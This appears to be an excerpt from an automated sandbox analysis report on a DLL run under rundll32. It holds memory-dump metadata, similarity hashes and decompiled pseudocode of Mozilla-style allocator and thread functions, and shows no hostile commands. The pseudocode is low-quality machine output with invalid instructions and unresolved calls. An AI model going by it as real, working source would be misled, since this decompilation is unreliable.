                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Enter$LeaveVirtual$AllocFree
                                                                                                                                              • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                              • API String ID: 3137982398-884734703
                                                                                                                                              • Opcode ID: 6c847ff6f21f00dc129f9f235ea5b7c0d24712e994cd68819a0b40d5df552b01
                                                                                                                                              • Instruction ID: f0b5ce4d16a0ca181a4715d0a1e0deb6b78cff4c43446ff4b7e9fee383dc9632
                                                                                                                                              • Opcode Fuzzy Hash: 6c847ff6f21f00dc129f9f235ea5b7c0d24712e994cd68819a0b40d5df552b01
                                                                                                                                              • Instruction Fuzzy Hash: 0A91AD31711A1885FAD7DB26E9493E57299AB5CBE4F08C225ED2D537E4DF38C64D8300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800030A0 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 137COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 24%
                                                                                                                                              			E000000011800030A0(void* __edx, void* __esi, void* __rcx, void* __rdx, void* __r8) {
				signed int _v72;
				char _v73;
				long long __rbx;
				signed long long __rdi;
				signed long long __rsi;
				signed long long __rbp;
				intOrPtr* __r13;
				long long __r14;
				signed long long __r15;
				void* _t12;
				void* _t13;
				long long _t20;
				intOrPtr* _t21;
				signed long long _t32;
				signed int* _t34;

				_t27 = __rdx;
				_t34 =  *0x8011f718; // 0x18017b428
				_v72 =  *_t34 ^ _t32;
				_t2 = _t27 + 0x100fff; // 0x101000
				if ((_t2 & 0xfff00000) - __rdx < 0) goto 0x80003259;
				r12d = r9d;
				EnterCriticalSection(??);
				_t21 =  *0x8017cb88;
				if (_t21 == 0) goto 0x80003118;
				_t20 =  *_t21;
				 *0x8017cb88 = _t20;
				LeaveCriticalSection(??);
				goto 0x8000313b;
				LeaveCriticalSection(??);
				 *((intOrPtr*)(_t20 - 0x77)) =  *((intOrPtr*)(_t20 - 0x77)) + _t13;
				return _t12;
				__eflags = __rax;
				if (__rax == 0) goto 0x80003259;
				__r9 =  &_v73;
				__rcx = __rdi;
				__rdx = __rbp;
				r8d = 0;
				__eax = E00000001180002190(__ebp, __rdi, __rbp, __r9);
				__eflags = __rax;
				if (__rax == 0) goto 0x8000322f;
				__r15 = __rax;
				__rsi = __rsi + 0xfff;
				__rsi = __rsi & 0xfffff000;
				__eflags = r12b;
				if (r12b == 0) goto 0x80003181;
				__eflags = _v73;
				if (_v73 != 0) goto 0x80003181;
				__rcx = __r15;
				__rdx = 0;
				0x8011d5e0();
				 *(__rbx + 0x20) = __r15;
				 *(__rbx + 0x28) = __rsi;
				 *((long long*)(__rbx + 0x30)) = __r14;
				__rax =  *((intOrPtr*)(__r14 + 0x10));
				 *__rbx =  *((intOrPtr*)(__r14 + 0x10));
				__rbp = 0x8017c8f0;
				__rcx = 0x8017c8f0;
				EnterCriticalSection(??);
				__rcx = 0x8017c848;
				__rdx = __rbx;
				__eax = E000000011800093C0(__eax, __ebx, __edi, 0x8017c848, __rbx, __r9);
				 *0x8017c2d0 =  *0x8017c2d0 + __rsi;
				 *0x8017c270 =  *0x8017c270 + __rdi;
				__rcx = 0x8017c8f0;
				LeaveCriticalSection(??);
				__rdi = __rdi - __rsi;
				if (__eflags == 0) goto 0x8000325c;
				__rsi = __rsi + __r15;
				__rsi = __rsi & 0x000fffff;
				__rbx = 0x100000;
				__eflags = 0x100000 - __rdi;
				__rbx =  >=  ? __rdi : 0x100000;
				__rbp = VirtualFree;
				asm("o16 nop [cs:eax+eax]");
				__rcx = __rsi;
				__rdx = 0x100000;
				r8d = 0x4000;
				__eax = VirtualFree(??, ??, ??);
				__eflags = __rsi & 0x000fffff;
				if ((__rsi & 0x000fffff) == 0) goto 0x80003281;
				__rsi = __rsi + 0x100000;
				__rdi = __rdi - ( >=  ? __rdi : 0x100000);
				__eflags = __rdi - 0x100000;
				__rbx = 0x100000;
				__eflags = __rdi;
				if (__rdi != 0) goto 0x80003200;
				goto 0x8000325c;
				__rsi = 0x8017c8c8;
				__rcx = 0x8017c8c8;
				EnterCriticalSection(??);
				__rax =  *0x8017cb88;
				 *0x100000 =  *0x8017cb88;
				 *0x8017cb88 = 0x100000;
				__rcx = 0x8017c8c8;
				LeaveCriticalSection(??);
				r15d = 0;
				_v72 = _v72 ^ __rsp;
				__rcx =  *__r13;
				__eflags =  *__r13 - (_v72 ^ __rsp);
				if ( *__r13 != (_v72 ^ __rsp)) goto 0x800032a2;
				__rax = __r15;
				return __eax;
			}


















                                                                                                                                              0x1800030a0
                                                                                                                                              0x1800030b0
                                                                                                                                              0x1800030be
                                                                                                                                              0x1800030c3
                                                                                                                                              0x1800030d4
                                                                                                                                              0x1800030da
                                                                                                                                              0x1800030ed
                                                                                                                                              0x1800030f3
                                                                                                                                              0x1800030fd
                                                                                                                                              0x1800030ff
                                                                                                                                              0x180003102
                                                                                                                                              0x180003110
                                                                                                                                              0x180003116
                                                                                                                                              0x18000311f
                                                                                                                                              0x18000312e
                                                                                                                                              0x180003131
                                                                                                                                              0x180003132
                                                                                                                                              0x180003135
                                                                                                                                              0x18000313b
                                                                                                                                              0x180003140
                                                                                                                                              0x180003143
                                                                                                                                              0x180003146
                                                                                                                                              0x180003149
                                                                                                                                              0x18000314e
                                                                                                                                              0x180003151
                                                                                                                                              0x180003157
                                                                                                                                              0x18000315a
                                                                                                                                              0x180003161
                                                                                                                                              0x180003168
                                                                                                                                              0x18000316b
                                                                                                                                              0x18000316d
                                                                                                                                              0x180003172
                                                                                                                                              0x180003174
                                                                                                                                              0x180003177
                                                                                                                                              0x18000317c
                                                                                                                                              0x180003181
                                                                                                                                              0x180003185
                                                                                                                                              0x180003189
                                                                                                                                              0x18000318d
                                                                                                                                              0x180003191
                                                                                                                                              0x180003194
                                                                                                                                              0x18000319b
                                                                                                                                              0x18000319e
                                                                                                                                              0x1800031a4
                                                                                                                                              0x1800031ab
                                                                                                                                              0x1800031ae
                                                                                                                                              0x1800031b3
                                                                                                                                              0x1800031ba
                                                                                                                                              0x1800031c1
                                                                                                                                              0x1800031c4
                                                                                                                                              0x1800031ca
                                                                                                                                              0x1800031cd
                                                                                                                                              0x1800031d3
                                                                                                                                              0x1800031d8
                                                                                                                                              0x1800031dd
                                                                                                                                              0x1800031e6
                                                                                                                                              0x1800031e8
                                                                                                                                              0x1800031ec
                                                                                                                                              0x1800031f3
                                                                                                                                              0x180003200
                                                                                                                                              0x180003203
                                                                                                                                              0x180003206
                                                                                                                                              0x18000320c
                                                                                                                                              0x18000320e
                                                                                                                                              0x180003210
                                                                                                                                              0x180003212
                                                                                                                                              0x180003215
                                                                                                                                              0x180003218
                                                                                                                                              0x18000321f
                                                                                                                                              0x180003228
                                                                                                                                              0x18000322b
                                                                                                                                              0x18000322d
                                                                                                                                              0x18000322f
                                                                                                                                              0x180003236
                                                                                                                                              0x180003239
                                                                                                                                              0x18000323f
                                                                                                                                              0x180003246
                                                                                                                                              0x180003249
                                                                                                                                              0x180003250
                                                                                                                                              0x180003253
                                                                                                                                              0x180003259
                                                                                                                                              0x180003261
                                                                                                                                              0x180003264
                                                                                                                                              0x180003268
                                                                                                                                              0x18000326b
                                                                                                                                              0x18000326d
                                                                                                                                              0x180003280

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter$FreeVirtual
                                                                                                                                              • String ID: MOZ_CRASH()
                                                                                                                                              • API String ID: 2516882-2608361144
                                                                                                                                              • Opcode ID: 2904c1736e827cd1fd81a1051d64d3aa6b3d5fdb5c19bdce5669090de8116fff
                                                                                                                                              • Instruction ID: ea9d7e40d17f8e769d619dbbc6e0e59cca36b8885792a978e454d6eb7f77aef5
                                                                                                                                              • Opcode Fuzzy Hash: 2904c1736e827cd1fd81a1051d64d3aa6b3d5fdb5c19bdce5669090de8116fff
                                                                                                                                              • Instruction Fuzzy Hash: A9514B32711A5886EBD3DB22ED593D573A8BB5CBE4F448125EE5D077A8EF38C2498300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800086C0 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 169COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                              			E000000011800086C0(void* __edx, void* __esi, void* __ebp, void* __rax, intOrPtr* __rcx, signed int __rdx, void* __r8, void* __r11) {
				signed char _t26;
				void* _t33;
				void* _t34;
				void* _t37;
				void* _t38;
				void* _t76;
				intOrPtr _t79;
				signed long long _t80;
				signed long long _t82;
				long long* _t83;
				void* _t100;
				intOrPtr _t102;
				signed long long _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t128;
				void* _t130;
				void* _t131;
				signed long long _t133;

				_t39 = __esi;
				_t37 = __edx;
				_t128 = __rcx;
				r15d = 1;
				_t131 =  !=  ? __r8 : _t130;
				if (__rdx == 0) goto 0x8000873f;
				if ( *0x8017c350 == 0) goto 0x8000892b;
				_t113 = __rdx & 0xfff00000;
				if (_t113 == __rdx) goto 0x800087c3;
				if ((_t26 & 0x00000002) != 0) goto 0x8000872a;
				_t76 =  *( *(_t113 + 0x30 + ((_t26 & 0x000000ff) + (_t26 & 0x000000ff) * 2) * 8) & 0xfffff000);
				_t8 = _t76 + 0x10; // 0xfc085fffffe04e8
				if ( *_t8 - 0xfc000 > 0) goto 0x8000883b;
				goto 0x8000884c;
				if (E000000011800080F0(__esi) == 0) goto 0x8000890e;
				_t114 =  *_t128;
				if (_t114 == 0) goto 0x80008883;
				if (_t131 - 0xf00 <= 0) goto 0x800088f8;
				if (_t131 - 0xfc000 > 0) goto 0x800088a2;
				_t133 = _t131 + 0x00000fff & 0xfffff000;
				_t9 = _t114 + 0x18; // 0x19
				EnterCriticalSection(??);
				r8b = 1;
				r9d = 0;
				E00000001180002000(__ebp, _t114, _t133, __r11);
				if (_t76 == 0) goto 0x800087ac;
				 *((intOrPtr*)(_t114 + 0x58)) =  *((intOrPtr*)(_t114 + 0x58)) + _t133;
				LeaveCriticalSection(??);
				if (_t76 != 0) goto 0x8000891c;
				goto 0x8000890e;
				EnterCriticalSection(??);
				_t115 =  *0x8017c848;
				if (_t115 == 0) goto 0x8000881b;
				_t116 =  *((intOrPtr*)(_t115 + 0x10));
				if (_t116 == 0) goto 0x8000881b;
				_t100 =  >  ? 0xffffffff : 0;
				if (_t100 == 0xffffffff) goto 0x800087f0;
				if (_t100 == 0) goto 0x8000881d;
				if (( *(_t116 + 0x18) & 0xfffffffe) != 0) goto 0x800087f9;
				LeaveCriticalSection(??);
				if ( *0x00000028 - 0xfc000 <= 0) goto 0x80008737;
				_t102 =  *0x00000030;
				if ( *((intOrPtr*)(0)) !=  *((intOrPtr*)(_t102 + 0x10))) goto 0x8000896d;
				_t79 =  *_t9;
				if (_t79 == 0) goto 0x8000885d;
				if (_t102 != _t79) goto 0x8000894c;
				_t109 = __rdx;
				if (_t133 - 0xfc000 > 0) goto 0x80008879;
				E000000011800036A0(_t34, _t38, __ebp, _t102, __rdx, _t133,  *0x00000028, __r11);
				goto 0x80008906;
				E00000001180003A20(_t34, _t38, _t102, _t109, _t133,  *0x00000028);
				goto 0x80008906;
				if (_t133 - 0x1f1 < 0) goto 0x800088b8;
				if (_t133 - 0xf00 > 0) goto 0x80008765;
				goto 0x800088f8;
				r8d = 0x100000;
				r9d = 0;
				E000000011800030A0(_t37, _t39,  *0x8017c8a8, _t133, _t133);
				goto 0x80008906;
				_t80 =  *0x8017b448; // 0x4
				if ( *((intOrPtr*)( *((intOrPtr*)( *[gs:0x58] + _t80 * 8)) + 8)) != 0) goto 0x800088f8;
				_t82 =  *0x8017b448; // 0x4
				_t83 =  *((intOrPtr*)( *[gs:0x58] + _t82 * 8));
				 *((long long*)(_t83 + 8)) =  *0x8017c8a8;
				r8d = 0;
				E00000001180007410(_t34, _t37, _t39,  *0x8017c8a8, _t133);
				if (_t83 != 0) goto 0x8000891c;
				_t33 =  *0x801623a8();
				 *_t83 = 0xc;
				return _t33;
			}























                                                                                                                                              0x1800086c0
                                                                                                                                              0x1800086c0
                                                                                                                                              0x1800086cb
                                                                                                                                              0x1800086d1
                                                                                                                                              0x1800086d7
                                                                                                                                              0x1800086de
                                                                                                                                              0x1800086e8
                                                                                                                                              0x1800086f4
                                                                                                                                              0x1800086fe
                                                                                                                                              0x180008721
                                                                                                                                              0x180008723
                                                                                                                                              0x180008726
                                                                                                                                              0x180008731
                                                                                                                                              0x18000873a
                                                                                                                                              0x180008746
                                                                                                                                              0x18000874c
                                                                                                                                              0x180008752
                                                                                                                                              0x18000875f
                                                                                                                                              0x18000876c
                                                                                                                                              0x180008779
                                                                                                                                              0x180008780
                                                                                                                                              0x180008787
                                                                                                                                              0x180008795
                                                                                                                                              0x180008798
                                                                                                                                              0x18000879b
                                                                                                                                              0x1800087a3
                                                                                                                                              0x1800087a5
                                                                                                                                              0x1800087af
                                                                                                                                              0x1800087b8
                                                                                                                                              0x1800087be
                                                                                                                                              0x1800087ca
                                                                                                                                              0x1800087d0
                                                                                                                                              0x1800087da
                                                                                                                                              0x1800087f0
                                                                                                                                              0x1800087f7
                                                                                                                                              0x180008802
                                                                                                                                              0x180008808
                                                                                                                                              0x18000880c
                                                                                                                                              0x180008819
                                                                                                                                              0x180008828
                                                                                                                                              0x180008835
                                                                                                                                              0x18000883e
                                                                                                                                              0x180008846
                                                                                                                                              0x18000884c
                                                                                                                                              0x180008852
                                                                                                                                              0x180008857
                                                                                                                                              0x18000885d
                                                                                                                                              0x18000886d
                                                                                                                                              0x18000886f
                                                                                                                                              0x180008874
                                                                                                                                              0x180008879
                                                                                                                                              0x18000887e
                                                                                                                                              0x18000888a
                                                                                                                                              0x18000889a
                                                                                                                                              0x1800088a0
                                                                                                                                              0x1800088a2
                                                                                                                                              0x1800088ae
                                                                                                                                              0x1800088b1
                                                                                                                                              0x1800088b6
                                                                                                                                              0x1800088b8
                                                                                                                                              0x1800088d5
                                                                                                                                              0x1800088de
                                                                                                                                              0x1800088ed
                                                                                                                                              0x1800088f1
                                                                                                                                              0x1800088fe
                                                                                                                                              0x180008901
                                                                                                                                              0x18000890c
                                                                                                                                              0x18000890e
                                                                                                                                              0x180008914
                                                                                                                                              0x18000892a

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT(!mArena || arena == mArena)$MOZ_RELEASE_ASSERT(mNode->mArenaId == mNode->mArena->mId)$MOZ_RELEASE_ASSERT(malloc_initialized)$basic_string
                                                                                                                                              • API String ID: 3168844106-215397149
                                                                                                                                              • Opcode ID: 51f639fc572835f83b3e0d5056b3f0182e7bf35e32584d99c66ba9e996cdc195
                                                                                                                                              • Instruction ID: 43c8ce43870a4fb8b90397510852661616d6e955a73d1fa97256cb6c6aa182c9
                                                                                                                                              • Opcode Fuzzy Hash: 51f639fc572835f83b3e0d5056b3f0182e7bf35e32584d99c66ba9e996cdc195
                                                                                                                                              • Instruction Fuzzy Hash: CC715A35311A0881FBE6DB16D9483E872E1BB5CBE0F58C225AE6D07BE5DF28C6599301
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 000000018003B050 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 279threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                              			E0000000118003B050(intOrPtr* __rcx, long long __rdx, void* __r8, void* __r10) {
				signed int _v72;
				intOrPtr _v88;
				long long _v96;
				void* _v104;
				void* _v112;
				char _v120;
				signed long long _v124;
				long long _v136;
				signed char _t88;
				void* _t100;
				intOrPtr _t101;
				signed char _t102;
				signed char _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				long long _t133;
				intOrPtr _t134;
				intOrPtr _t143;
				intOrPtr _t146;
				long long* _t160;
				intOrPtr* _t168;
				intOrPtr _t172;
				intOrPtr* _t197;
				signed char* _t203;
				signed long long _t213;
				long long _t214;
				signed long long _t215;
				void* _t225;
				long long _t228;
				signed int* _t229;
				intOrPtr* _t230;
				long long* _t231;

				_t215 =  &_v104;
				_t229 =  *0x8011f718; // 0x18017b428
				_v72 =  *_t229 ^ _t215;
				_t143 =  *__rcx;
				if (_t143 == 0) goto 0x8003b458;
				_t228 = __rdx;
				_t230 = __rcx;
				r8d = 1;
				_t203 =  *(__rcx + 8);
				if (_t143 == 1) goto 0x8003b0cd;
				 *((long long*)(__rcx)) = _t143 + 0xffffffff;
				 *(__rcx + 8) =  &(_t203[1]);
				_t213 = ( *_t203 & 0x7f) << _t102;
				if ((_t104 & 0x00000080) == 0) goto 0x8003b0f4;
				if ( *__rcx != 0) goto 0x8003b093;
				goto 0x8003b458;
				asm("movups xmm0, [eax]");
				asm("inc ecx");
				_t146 =  *((intOrPtr*)(__rcx + 0x18));
				_t207 =  ==  ? __r8 :  *((intOrPtr*)(__rcx + 0x10)) + _t146;
				 *((long long*)(__rcx + 0x10)) = 0;
				 *((long long*)(__rcx + 0x18)) =  ==  ? __r8 :  *((intOrPtr*)(__rcx + 0x10)) + _t146;
				goto 0x8003b0af;
				_v124 = _t213;
				if (_t213 == 0) goto 0x8003b41f;
				_t12 =  &_v104; // 0x39
				r8d = 8;
				E00000001180026550(_t102 + 7, _t12, __rcx, __r10);
				r9d = 8;
				E000000011800A0650(_v104, _t225);
				if (_v88 != 0) goto 0x8003b479;
				_t133 = _v112;
				 *((long long*)(__rdx + 0xa8)) = _t133;
				 *((long long*)(__rdx + 0xb0)) = _t133;
				if ( *((char*)(__rdx + 0x70)) == 0) goto 0x8003b22b;
				GetCurrentThreadId();
				0x80047230();
				 *((intOrPtr*)(__rdx + 0x60)) = _t101;
				if ( *((char*)(__rdx + 0x70)) == 0) goto 0x8003b197;
				 *((intOrPtr*)(__rdx + 0x60)) = 0;
				0x80047280();
				if ( *((intOrPtr*)(__rdx + 0x78)) == 0) goto 0x8003b239;
				if ( *((char*)(__rdx + 0x70)) == 0) goto 0x8003b1bf;
				GetCurrentThreadId();
				0x80047230();
				 *((intOrPtr*)(__rdx + 0x60)) = _t105;
				_t197 =  *((intOrPtr*)(__rdx + 0x78));
				if (_t197 == 0) goto 0x8003b445;
				_t134 =  *_t197;
				_t88 =  *((intOrPtr*)(_t134 + 0x10))();
				if ( *((char*)(__rdx + 0x70)) == 0) goto 0x8003b1f4;
				 *((intOrPtr*)(__rdx + 0x60)) = 0;
				0x80047280();
				if (_t197 == 0) goto 0x8003b4be;
				_t214 = _v124;
				if (_t134 - _t214 >= 0) goto 0x8003b30b;
				_t160 =  *0x8011f720; // 0x18017f798
				 *_t160 = "MOZ_RELEASE_ASSERT(aBuffer.BufferLength().value() >= len)";
				 *0 = 0x589;
				0x8011d480();
				if ( *((intOrPtr*)(__rdx + 0x78)) != 0) goto 0x8003b1a0;
				 *0xFD084DE7FFFFFFD9 =  *((long long*)(0xfd084de7ffffffd9)) - 1;
				asm("invalid");
				asm("insb");
				 *_t231 = 0x80122410;
				E00000001180004A00(_t88 & 0x0000002c, 0x48cd450f00000048);
				E0000000118000BA90(0x80122410, 0x180122410);
				0x8011d5e0();
				asm("xorps xmm0, xmm0");
				asm("movups [esi], xmm0");
				 *0x180122420 = 0;
				 *0x180122428 = 1;
				 *0x180122430 = "MOZ_RELEASE_ASSERT(array.append(std::make_pair((RegisteredThread*)nullptr, t.get())))";
				asm("movups [esi+0x24], xmm0");
				asm("movups [esi+0x31], xmm0");
				 *((long long*)(_t231 + 8)) = 0x80122410;
				 *((long long*)(_t231 + 0x10)) = 0;
				 *((intOrPtr*)(_t231 + 0x18)) = _t105;
				 *((long long*)(_t231 + 0x40)) = 0;
				_v112 = 0;
				_v104 = _t231;
				_t48 =  &_v104; // 0x39
				E0000000118002B700(__rdx, _t48);
				_t168 = _v104;
				_v104 = 0;
				if (_t168 == 0) goto 0x8003b2ff;
				 *((intOrPtr*)( *_t168 + 8))();
				E00000001180038F00( &_v112, 0);
				_v104 = _t230;
				_t54 =  &_v124; // 0x25
				_v96 = _t54;
				_v112 = __rdx;
				if ( *((char*)(__rdx + 0x70)) == 0) goto 0x8003b33e;
				GetCurrentThreadId();
				0x80047230();
				 *((intOrPtr*)(__rdx + 0x60)) = _t106;
				_v120 = _t214;
				_v136 = 0;
				_t62 =  &_v120; // 0x29
				_t63 =  &_v104; // 0x39
				_t64 =  &_v112; // 0x31
				E0000000118003B4F0(__rdx, _t62, _t63, _t64);
				_t172 = _v112;
				if ( *((char*)(_t172 + 0x70)) == 0) goto 0x8003b37d;
				 *((long long*)(_t172 + 0x60)) = 0;
				0x80047280();
				_t68 =  &_v104; // 0x39
				r8d = 8;
				E00000001180026550(_t102 + 7, _t68, _t230, __r10);
				r9d = 8;
				E000000011800A0650(_v104, _t64);
				if (_v88 != 0) goto 0x8003b490;
				 *((long long*)(_t228 + 0xb8)) = _v112;
				_t75 =  &_v104; // 0x39
				r8d = 8;
				E00000001180026550(_t102 + 7, _t75, _t230, __r10);
				r9d = 8;
				_t100 = E000000011800A0650(_v104, _t64);
				if (_v88 != 0) goto 0x8003b4a7;
				 *((long long*)(_t228 + 0xc0)) = _v112;
				 *((long long*)(_t228 + 0xc8)) = 0;
				if ( *_t229 != (_v72 ^ _t215)) goto 0x8003b4df;
				return _t100;
			}



































                                                                                                                                              0x18003b05c
                                                                                                                                              0x18003b060
                                                                                                                                              0x18003b06e
                                                                                                                                              0x18003b073
                                                                                                                                              0x18003b079
                                                                                                                                              0x18003b07f
                                                                                                                                              0x18003b082
                                                                                                                                              0x18003b08b
                                                                                                                                              0x18003b093
                                                                                                                                              0x18003b09e
                                                                                                                                              0x18003b0a8
                                                                                                                                              0x18003b0ab
                                                                                                                                              0x18003b0b6
                                                                                                                                              0x18003b0bb
                                                                                                                                              0x18003b0c6
                                                                                                                                              0x18003b0c8
                                                                                                                                              0x18003b0cd
                                                                                                                                              0x18003b0d0
                                                                                                                                              0x18003b0d4
                                                                                                                                              0x18003b0e2
                                                                                                                                              0x18003b0e6
                                                                                                                                              0x18003b0ee
                                                                                                                                              0x18003b0f2
                                                                                                                                              0x18003b0f4
                                                                                                                                              0x18003b0fa
                                                                                                                                              0x18003b100
                                                                                                                                              0x18003b108
                                                                                                                                              0x18003b10e
                                                                                                                                              0x18003b122
                                                                                                                                              0x18003b12b
                                                                                                                                              0x18003b138
                                                                                                                                              0x18003b13e
                                                                                                                                              0x18003b143
                                                                                                                                              0x18003b14b
                                                                                                                                              0x18003b159
                                                                                                                                              0x18003b15f
                                                                                                                                              0x18003b16f
                                                                                                                                              0x18003b174
                                                                                                                                              0x18003b184
                                                                                                                                              0x18003b186
                                                                                                                                              0x18003b192
                                                                                                                                              0x18003b19a
                                                                                                                                              0x18003b1a6
                                                                                                                                              0x18003b1a8
                                                                                                                                              0x18003b1b5
                                                                                                                                              0x18003b1ba
                                                                                                                                              0x18003b1bf
                                                                                                                                              0x18003b1c7
                                                                                                                                              0x18003b1cd
                                                                                                                                              0x18003b1d3
                                                                                                                                              0x18003b1df
                                                                                                                                              0x18003b1e6
                                                                                                                                              0x18003b1ef
                                                                                                                                              0x18003b1f7
                                                                                                                                              0x18003b1fd
                                                                                                                                              0x18003b204
                                                                                                                                              0x18003b211
                                                                                                                                              0x18003b218
                                                                                                                                              0x18003b21b
                                                                                                                                              0x18003b226
                                                                                                                                              0x18003b233
                                                                                                                                              0x18003b242
                                                                                                                                              0x18003b245
                                                                                                                                              0x18003b247
                                                                                                                                              0x18003b251
                                                                                                                                              0x18003b266
                                                                                                                                              0x18003b279
                                                                                                                                              0x18003b289
                                                                                                                                              0x18003b294
                                                                                                                                              0x18003b297
                                                                                                                                              0x18003b29a
                                                                                                                                              0x18003b2a2
                                                                                                                                              0x18003b2a8
                                                                                                                                              0x18003b2ab
                                                                                                                                              0x18003b2af
                                                                                                                                              0x18003b2b3
                                                                                                                                              0x18003b2b7
                                                                                                                                              0x18003b2bf
                                                                                                                                              0x18003b2c3
                                                                                                                                              0x18003b2cb
                                                                                                                                              0x18003b2d4
                                                                                                                                              0x18003b2d9
                                                                                                                                              0x18003b2e1
                                                                                                                                              0x18003b2e6
                                                                                                                                              0x18003b2eb
                                                                                                                                              0x18003b2f7
                                                                                                                                              0x18003b2fc
                                                                                                                                              0x18003b306
                                                                                                                                              0x18003b30b
                                                                                                                                              0x18003b310
                                                                                                                                              0x18003b315
                                                                                                                                              0x18003b31a
                                                                                                                                              0x18003b325
                                                                                                                                              0x18003b327
                                                                                                                                              0x18003b334
                                                                                                                                              0x18003b339
                                                                                                                                              0x18003b33e
                                                                                                                                              0x18003b342
                                                                                                                                              0x18003b34b
                                                                                                                                              0x18003b350
                                                                                                                                              0x18003b355
                                                                                                                                              0x18003b35d
                                                                                                                                              0x18003b362
                                                                                                                                              0x18003b36b
                                                                                                                                              0x18003b36d
                                                                                                                                              0x18003b378
                                                                                                                                              0x18003b37d
                                                                                                                                              0x18003b385
                                                                                                                                              0x18003b38b
                                                                                                                                              0x18003b39f
                                                                                                                                              0x18003b3a8
                                                                                                                                              0x18003b3b5
                                                                                                                                              0x18003b3c0
                                                                                                                                              0x18003b3c8
                                                                                                                                              0x18003b3d0
                                                                                                                                              0x18003b3d6
                                                                                                                                              0x18003b3ea
                                                                                                                                              0x18003b3f3
                                                                                                                                              0x18003b400
                                                                                                                                              0x18003b40b
                                                                                                                                              0x18003b413
                                                                                                                                              0x18003b42e
                                                                                                                                              0x18003b444

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread
